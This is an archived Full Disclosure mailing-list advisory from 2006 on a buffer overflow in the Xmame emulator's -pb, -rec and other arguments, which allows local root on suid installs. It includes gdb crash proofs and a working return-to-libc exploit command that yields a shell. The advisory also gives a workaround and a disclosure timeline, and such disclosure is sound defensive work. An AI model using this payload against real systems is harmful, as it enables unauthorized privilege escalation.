Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

mysec.org Security Advisory : Xmame buffer overflow, with a possibility of privilege escalation.

From: KaiJern Lau <xwings.net () gmail com>
Date: Wed, 11 Jan 2006 13:40:00 +0800
With Exploit Code :

http://www.milw0rm.com/id.php?id=1412

---------- Forwarded message ----------
From: KaiJern Lau <xwings.net () gmail com>
Date: Jan 11, 2006 3:35 AM
Subject: mysec.org Security Advisory : Xmame buffer overflow, with a
possibility of privilege escalation.
To: full-disclosure () lists grok org uk

mysec.org Security Advisory : Xmame buffer overflow, with a
possibility of privilege escalation.

Xmame buffer overflow, with a possibility of privilege escalation

mysec.org Security Advisory 11 Jan 2006
http://www.mysec.org

I. BACKGROUND

Xmame and xmess are ports of MAME, the Multiple Arcade Machine Emulator
and MESS, the Multi Emulator Super System. They run primarily on Linux
and various flavors of UNIX, although some other operating systems,
such as BeOS, are supported to some degree.

II. DESCRIPTION

Several functions in src/fileio.c and src/unix/fileio.c did not handle
large input propely. These can cause buffer overflow.

Most of the distros install xmame  with suid root. There is a possibility
for a local user to gain root privilege.

Exploitation requires an attacker to send a specially
constructed input for these few arguments.

-lang
-ctrlr
-pb
-rec

For Ubuntu default installation, which is version 0.86 there is a
option which infected.

-jdev


III. POC

POC for -pb and -rec options ,
other options will be base on these info.

*********
* -pb
*********

(gdb) r -pb `ruby -e 'print "A" * 1034'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/games/xmame.x11 -pb
`ruby -e 'print "A" * 1034'`
(no debugging symbols found)
** More **
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1211603264 (LWP 8770)]
DGA requires root rights
Use of DGA-modes is disabled
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
info: trying to parse: /etc/xmame/xmamerc
error: /etc/xmame/xmamerc(71): unknown option joyusb-calibrate,
ignoring line
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /etc/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1211603264 (LWP 8770)]
0x41414141 in ?? ()

**********
* -rec
**********

(gdb) r -rec `ruby -e 'print "A" * 1020'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/xwings/coding/sploit/xmame/xmame-0.102/xmame.x11
-rec `ruby -e 'print "A" * 1020'`
(no debugging symbols found)
** More **
(no debugging symbols found)
info: trying to parse: /usr/local/share/xmame/xmamerc
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /usr/local/share/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
info: trying to parse: /usr/local/share/xmame/rc/robbyrc
info: trying to parse: /home/xwings/.xmame/rc/robbyrc

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

*********************
* Successful Exploit
*********************

Platform : Ubuntu
Xmame Version : 0.102 - Selfcompile
Exploit Method : Return to Libc

xwings@pauillac.<xmame-0.102>$ ./xmame.x0 -pb `ruby -e 'print "\x90" *
1016;print "\xd0\xf6\xd8\xb7";print "DUMP";print "\xaa\xf8\xff\xbf"'`
info: trying to parse: /usr/local/share/xmame/xmamerc
info: trying to parse: /home/xwings/.xmame/xmamerc
info: trying to parse: /usr/local/share/xmame/xmame-x11rc
info: trying to parse: /home/xwings/.xmame/xmame-x11rc
sh-3.1$


IV. DETECTION

mysec.org has confirmed this vulnerability on xmame 0.102. All previous
versions are suspected vulnerable to this issue.

V. WORKAROUND

Disable SUID root for all the installed xmame.
Do not run xmame.x11, xmame.sdl is recommended.

VI. VENDOR RESPONSE

Upgrade to CVS version.

http://x.mame.net/download.html


VIII. DISCLOSURE TIMELINE

1st Jan 2006, Initial vendor notification
2nd January 2006,  Initial vendor response
11th January 2006, Vendor reply, bug fixed.
11th January 2006, Coordinated public disclosure

IX. CREDIT

Bug Founder : KaiJern, Lau
Email : xwings <at> mysec <dot> org

Thanks to all the folks pulltheplug.org.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: